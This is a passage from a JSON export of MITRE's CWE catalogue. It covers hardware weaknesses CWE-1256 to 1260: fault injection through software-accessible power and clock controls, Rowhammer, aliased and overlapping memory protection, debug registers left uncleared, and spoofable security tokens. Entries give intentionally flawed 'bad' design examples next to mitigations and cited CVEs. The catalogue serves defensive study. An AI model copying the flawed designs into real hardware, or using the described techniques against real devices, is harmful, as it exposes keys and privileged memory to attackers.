(rst==1\'b1)q&lt;4\'b0000;elseq&lt;a;endendmodule","attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","",""]}],"Body_Text":"This code demonstrates the transfer of a secret key using a Parallel-In/Parallel-Out shift. In a parallel shift, data confounded by multiple bits of the key, not just one."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-12788","Description":"CMAC verification vulnerable to timing and power attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12788"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1184"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Accellera IP Security Assurance (IPSA) Working Group","Contribution_Organization":"Accellera Systems Initiative","Contribution_Date":"2020-09-09","Contribution_Comment":"Submitted new material that could be added to already-existing entry CWE-1255. Added new Potential Mitigations, a new example, an observed example, and an additional reference."}}},"1256":{"attr":{"@_ID":"1256","@_Name":"Improper Restriction of Software Interfaces to Hardware Features","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product provides software-controllable\\n\\t\\t\\tdevice functionality for capabilities such as power and\\n\\t\\t\\tclock management, but it does not properly limit\\n\\t\\t\\tfunctionality that can lead to modification of\\n\\t\\t\\thardware memory or register bits, or the ability to\\n\\t\\t\\tobserve physical side channels.","Extended_Description":{"xhtml:p":["It is frequently assumed that physical attacks\\n              such as fault injection and side-channel analysis\\n              require an attacker to have physical access to the\\n              target device.  This assumption may be false if the\\n              device has improperly secured power management features,\\n              or similar features.  For mobile devices, minimizing\\n              power consumption is critical, but these devices run a\\n              wide variety of applications with different performance\\n              requirements. Software-controllable mechanisms to\\n              dynamically scale device voltage and frequency and\\n              monitor power consumption are common features in today\'s\\n              chipsets, but they also enable attackers to mount fault\\n              injection and side-channel attacks without having\\n              physical access to the device.","Fault injection attacks involve strategic\\n              manipulation of bits in a device to achieve a desired\\n              effect such as skipping an authentication step,\\n              elevating privileges, or altering the output of a\\n              cryptographic operation.  Manipulation of the device\\n              clock and voltage supply is a well-known technique to\\n              inject faults and is cheap to implement with physical\\n              device access.  Poorly protected power management\\n              features allow these attacks to be performed from\\n              software.  Other features, such as the ability to write\\n              repeatedly to DRAM at a rapid rate from unprivileged\\n              software, can result in bit flips in other memory\\n              locations (Rowhammer, [REF-1083]).","Side channel analysis requires gathering\\n\\t\\t\\t  measurement traces of physical quantities such as power\\n\\t\\t\\t  consumption.  Modern processors often include power\\n\\t\\t\\t  metering capabilities in the hardware itself (e.g.,\\n\\t\\t\\t  Intel RAPL) which if not adequately protected enable\\n\\t\\t\\t  attackers to gather measurements necessary for\\n\\t\\t\\t  performing side-channel attacks from software."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Clock/Counter IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"An architect may initiate introduction of\\n\\t\\t\\t\\t\\tthis weakness via exacting requirements for\\n\\t\\t\\t\\t\\tsoftware accessible power/clock management\\n\\t\\t\\t\\t\\trequirements"},{"Phase":"Implementation","Note":"An implementer may introduce this weakness\\n\\t\\t\\t\\t\\tby assuming there are no consequences to unbounded\\n\\t\\t\\t\\t\\tpower and clock management for secure components\\n\\t\\t\\t\\t\\tfrom untrusted ones."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Modify Memory","Modify Application Data","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Perform a security evaluation of system-level\\n\\t\\tarchitecture and design with software-aided physical attacks\\n\\t\\tin scope."},{"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":"Use custom software to change registers that control clock settings or power settings to try to bypass security locks, or repeatedly write DRAM to try to change adjacent locations. This can be effective in extracting or changing data. The drawback is that it cannot be run before manufacturing, and it may require specialized software."},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Ensure proper access control mechanisms protect software-controllable features altering physical operating conditions such as clock frequency and voltage."}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example considers the Rowhammer problem [REF-1083]. The Rowhammer issue was caused by a program in a tight loop writing repeatedly to a location to which the program was allowed to write but causing an adjacent memory location value to change.","Example_Code":[{"#text":"Continuously writing the same value to the same address causes the value of an adjacent location to change value.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Redesign the RAM devices to reduce inter capacitive coupling making the Rowhammer exploit impossible.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":["Preventing the loop required to defeat the Rowhammer exploit is not always possible:","While the redesign may be possible for new devices, a redesign is not possible in existing devices. There is also the possibility that reducing capacitance with a relayout would impact the density of the device resulting in a less capable, more costly device."]},{"Intro_Text":"Suppose a hardware design implements a set of software-accessible registers for scaling clock frequency and voltage but does not control access to these registers. Attackers may cause register and memory changes and race conditions by changing the clock or voltage of the device under their control."},{"Intro_Text":"Consider the following SoC\\n\\t      design. Security-critical settings for scaling clock\\n\\t      frequency and voltage are available in a range of\\n\\t      registers bounded by [PRIV_END_ADDR : PRIV_START_ADDR]\\n\\t      in the tmcu.csr module in the HW Root of Trust. These\\n\\t      values are writable based on the lock_bit register in\\n\\t      the same module. The lock_bit is only writable by\\n\\t      privileged software running on the tmcu.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":"We assume that untrusted software running on any of the\\n\\t      Core{0-N} processors has access to the input and output\\n\\t      ports of the hrot_iface. If untrusted software can clear\\n\\t      the lock_bit or write the clock frequency and voltage\\n\\t      registers due to inadequate protection, a fault\\n\\t      injection attack could be performed."}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11157","Description":"Plundervolt: Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access [REF-1081].","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11157"},{"Reference":"CVE-2020-8694","Description":"PLATYPUS Attack: Insufficient access control in the Linux kernel driver for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8694"},{"Reference":"CVE-2020-8695","Description":"Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695"},{"Reference":"CVE-2020-12912","Description":"AMD extension to a Linux service does not require privileged access to the RAPL interface, allowing side-channel attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12912"},{"Reference":"CVE-2015-0565","Description":"NaCl in 2015 allowed the CLFLUSH instruction, making Rowhammer attacks possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0565"}]},"Functional_Areas":{"Functional_Area":["Power","Clock"]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1081"}},{"attr":{"@_External_Reference_ID":"REF-1082"}},{"attr":{"@_External_Reference_ID":"REF-1083"}},{"attr":{"@_External_Reference_ID":"REF-1225"}},{"attr":{"@_External_Reference_ID":"REF-1217"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Functional_Areas, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection method"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-15","Contribution_Comment":"updated description and extended description, detection method, and observed examples"}]}},"1257":{"attr":{"@_ID":"1257","@_Name":"Improper Access Control Applied to Mirrored or Aliased Memory Regions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region.","Extended_Description":{"xhtml:p":["Hardware product designs often need to implement memory protection features that enable privileged software to define isolated memory regions and access control (read/write) policies. Isolated memory regions can be defined on different memory spaces in a design (e.g. system physical address, virtual address, memory mapped IO).","Each memory cell should be mapped and assigned a system address that the core software can use to read/write to that memory. It is possible to map the same memory cell to multiple system addresses such that read/write to any of the aliased system addresses would be decoded to the same memory cell.","This is commonly done in hardware designs for redundancy and simplifying address decoding logic. If one of the memory regions is corrupted or faulty, then that hardware can switch to using the data in the mirrored memory region. Memory aliases can also be created in the system address map if the address decoder unit ignores higher order address bits when mapping a smaller address region into the full system address.","A common security weakness that can exist in such memory mapping is that aliased memory regions could have different read/write access protections enforced by the hardware such that an untrusted agent is blocked from accessing a memory address but is not blocked from accessing the corresponding aliased memory address. Such inconsistency can then be used to bypass the access protection of the primary memory block and read or modify the protected memory.","An untrusted agent could also possibly create memory aliases in the system address map for malicious purposes if it is able to change the mapping of an address region or modify memory region sizes."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Network on Chip IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Memory","Likelihood":"High"},{"Scope":"Availability","Impact":"DoS: Instability","Likelihood":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"The checks should be applied for consistency access rights between primary memory regions and any mirrored or aliased memory regions. If different memory protection units (MPU) are protecting the aliased regions, their protected range definitions and policies should be synchronized."},{"Phase":["Architecture and Design","Implementation"],"Description":"The controls that allow enabling memory aliases or changing the size of mapped memory regions should only be programmable by trusted software components."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["In a System-on-a-Chip (SoC) design the system fabric uses 16 bit addresses. An IP unit (Unit_A) has 4 kilobyte of internal memory which is mapped into a 16 kilobyte address range in the system fabric address map.","To protect the register controls in Unit_A unprivileged software is blocked from accessing addresses between 0x0000 \u2013 0x0FFF.","The address decoder of Unit_A masks off the higher order address bits and decodes only the lower 12 bits for computing the offset into the 4 kilobyte internal memory space."],"xhtml:table":{"xhtml:tr":[{"xhtml:td":["System Address","Mapped to"]},{"xhtml:td":["0x0000 \u2013 0x3FFF","Unit_A  registers : 0x0000 \u2013 0x0FFF"]},{"xhtml:td":["0x4000 \u2013 0xFFFF","Other IPs &amp; Memory"]}]}},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["In this design  the aliased memory address ranges are these:","0x0000 \u2013 0x0FFF","0x1000 \u2013 0x1FFF","0x2000 \u2013 0x2FFF","0x3000 \u2013 0x3FFF","The same register can be accessed using four different addresses: 0x0000, 0x1000, 0x2000, 0x3000.","The system address filter only blocks access to range 0x0000 - 0x0FFF and does not block access to the aliased addresses in 0x1000 - 0x3FFF range. Thus, untrusted software can leverage the aliased memory addresses to bypass the memory protection."],"xhtml:br":""},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["In this design the aliased memory addresses (0x1000 - 0x3FFF) could be blocked from all system software access since they are not used by software.","Alternately, the MPU logic can be changed to apply the memory protection policies to the full address range mapped to Unit_A (0x0000 - 0x3FFF)."]}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"}}},"1258":{"attr":{"@_ID":"1258","@_Name":"Exposure of Sensitive System Information Due to Uncleared Debug Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered.","Extended_Description":{"xhtml:p":"Security sensitive values, keys, intermediate steps of cryptographic operations, etc. are stored in temporary registers in the hardware. If these values are not cleared when debug mode is entered they may be accessed by a debugger allowing sensitive information to be accessible by untrusted parties."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"212","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Whenever debug mode is enabled, all registers containing sensitive assets must be cleared."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A cryptographic core in a System-On-a-Chip (SoC) is used for cryptographic acceleration and implements several cryptographic operations (e.g., computation of AES encryption and decryption, SHA-256, HMAC, etc.). The keys for these operations or the intermediate values are stored in registers internal to the cryptographic core. These internal registers are in the Memory Mapped Input Output (MMIO) space and are blocked from access by software and other untrusted agents on the SoC. These registers are accessible through the debug and test interface.","Example_Code":[{"#text":"In the above scenario, registers that store keys and intermediate values of cryptographic operations are not cleared when system enters debug mode. An untrusted actor running a debugger may read the contents of these registers and gain access to secret keys and other sensitive cryptographic information.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Whenever the chip enters debug mode, all registers containing security-sensitive data are be cleared rendering them unreadable.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns, Relationships"},"Previous_Entry_Name":{"#text":"Sensitive Information Uncleared During Hardware Debug Flows","attr":{"@_Date":"2020-08-20"}}}},"1259":{"attr":{"@_ID":"1259","@_Name":"Improper Restriction of Security Token Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected.","Extended_Description":"Systems-On-A-Chip (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify which actions originated from which agent. These actions may be one of the directives: \'read\', \'write\', \'program\', \'reset\', \'fetch\', \'compute\', etc. Security Tokens are assigned to every agent in the System that is capable of generating an action or receiving an action from another agent. Multiple Security Tokens may be assigned to an agent and may be unique based on the agent\'s trust level or allowed privileges. Since the Security Tokens are integral for the maintenence of security in an SoC, they need to be protected properly. A common weakness afflicting Security Tokens is improperly restricting the assignment to trusted components. Consequently, an improperly protected Security Token may be able to be programmed by a malicious agent (i.e., the Security Token is mutable) to spoof the action as if it originated from a trusted agent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Modify Memory","Modify Memory","DoS: Crash, Exit, or Restart"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["Security Token assignment review checks for design inconsistency and common weaknesses.","Security-Token definition and programming flow is tested in both pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"For example, consider a system with a register for storing an AES key for encryption and decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key register assets have an associated control register, AES_KEY_ACCESS_POLICY, which provides the necessary access controls. This access-policy register defines which agents may engage in a transaction, and the type of transaction, with the AES-key registers. Each bit in this 32-bit register defines a security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows respective action from an agent whose identity matches the number of the bit and, if \u201c0\u201d (i.e., Clear), disallows the respective action to that corresponding agent.","Body_Text":[{"#text":"Let\u2019s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \u201c1\u201d and \u201c2\u201d.","xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Description","Default"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption",0]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","AES key access register [31:0]",2]}]}},"An agent with Security Token \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \u201c1\u201d.","The SoC does not properly protect the Security Token of the agents, and, hence, the Aux-controller in the above example can spoof the transaction (i.e., send the transaction as if it is coming from the Main-controller to access the AES-Key registers)"],"Example_Code":[{"#text":"The Aux-controller could program its Security Token to \u201c1\u201d from \u201c2\u201d.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The SoC needs to protect the Security Tokens. None of the agents in the SoC should have the ability to change the Security Token.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements. Currently it is expressed as a general absence of a protection mechanism as opposed to a specific mistake, and the entry\'s name and description could be interpreted as applying to software.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-03-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Improper Protection of Security Identifiers","attr":{"@_Date":"2020-08-20"}}}},"1260":{"attr":{"@_ID":"1260","@_Name":"Improper Handling of Overlap Between Protected Memory Ranges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product allows address regions to overlap, which can result in the bypassing of intended memory protection.","Extended_Description":{"xhtml:p":["Isolated memory regions and access control (read/write) policies are used by hardware to protect privileged software. Software components are often allowed to change or remap memory region definitions in order to enable flexible and dynamically changeable memory management by system software.","If a software component running at lower privilege can program a memory address region to overlap with other memory regions used by software running at higher privilege, privilege escalation may be available to attackers. The memory protection unit (MPU) logic can incorrectly handle such an address overlap and allow the lower-privilege software to read or write into the protected memory region, resulting in privilege escalation attack. An address overlap weakness can also be used to launch a denial of service attack on the higher-privilege software memory regions."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design or implementation and identified later during the Testing phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Memory","Read Memory","DoS: Instability"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Create a high privilege memory block of any arbitrary size. Attempt to create a lower privilege memory block with an overlap of the high privilege memory block. If the creation attempt works, fix the hardware. Repeat the test.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Ensure that memory regions are isolated as intended and that access control (read/write) policies are used by hardware to protect privileged software."}},{"Phase":"Implementation","Description":{"xhtml:p":["For all of the programmable memory protection regions, the memory protection unit (MPU) design can define a priority scheme.","For example: if three memory regions can be programmed (Region_0, Region_1, and Region_2), the design can enforce a priority scheme, such that, if a system address is within multiple regions, then the region with the lowest ID takes priority and the access-control policy of that region will be applied.  In some MPU designs, the priority scheme can also be programmed by trusted software.","Hardware logic or trusted firmware can also check for region definitions and block programming of memory regions with overlapping addresses.","The memory-access-control-check filter can also be designed to apply a policy filter to all of the overlapping ranges, i.e., if an address is within Region_0 and Region_1, then access to this address is only granted if both Region_0 and Region_1 policies allow the access."]},"Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["For example, consider a design with a 16-bit address that has two software privilege levels: Privileged_SW and Non_privileged_SW. To isolate the system memory regions accessible by these two privilege levels, the design supports three memory regions: Region_0, Region_1, and Region_2.","Each region is defined by two 32 bit registers: its range and its access policy.","Certain bits of the access policy are defined symbolically as follows:","For any requests from software, an address-protection filter checks the address range and access policies for each of the three regions, and only allows software access if all three filters allow access.","Consider the following goals for access control as intended by the designer:","The intention is that Non_privileged_SW cannot modify memory region and policies defined by Privileged_SW in Region_0 and Region_1. Thus, it cannot read or write the memory regions that Privileged_SW is using."],"xhtml:ul":[{"xhtml:li":["Address_range[15:0]: specifies the Base address of the region","Address_range[31:16]: specifies the size of the region","Access_policy[31:0]: specifies what types of software can access a region and which actions are allowed"]},{"xhtml:li":["Access_policy.read_np: if set to one, allows reads from Non_privileged_SW","Access_policy.write_np: if set to one, allows writes from Non_privileged_SW","Access_policy.execute_np: if set to one, allows code execution by Non_privileged_SW","Access_policy.read_p: if set to one, allows reads from Privileged_SW","Access_policy.write_p: if set to one, allows writes from Privileged_SW","Access_policy.execute_p: if set to one, allows code execution by Privileged_SW"]},{"xhtml:li":["Region_0 &amp; Region_1: registers are programmable by Privileged_SW","Region_2: registers are programmable by Non_privileged_SW"]}]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"Non_privileged_SW can program the Address_range register for Region_2 so that its address overlaps with the ranges defined by Region_0 or Region_1. Using this capability, it is possible for Non_privileged_SW to block any memory region from being accessed by Privileged_SW, i.e., Region_0 and Region_1."},{"#text":"Ensure that software accesses to memory regions are only permitted if all three filters permit access. Additionally, the scheme could define a memory region priority to ensure that Region_2 (the memory region defined by Non_privileged_SW) cannot overlap Region_0 or Region_1 (which are used by Privileged_SW).","attr":{"@_Nature":"good"}}],"Body_Text":"This design could be improved in several ways."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-7096","Description":"virtualization product allows compromise of hardware product by accessing certain remapping registers.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7096"},{"Reference":"[REF-1100]","Description":"processor design flaw allows ring 0 code to access more privileged rings by causing a register window to overlap a range of protected system RAM [REF-1100]","Link":"https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1100"}}},"Notes":{"Note":{"#text":"As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Related_Attack_Patterns"},{"Modification_Name":"CWE Content 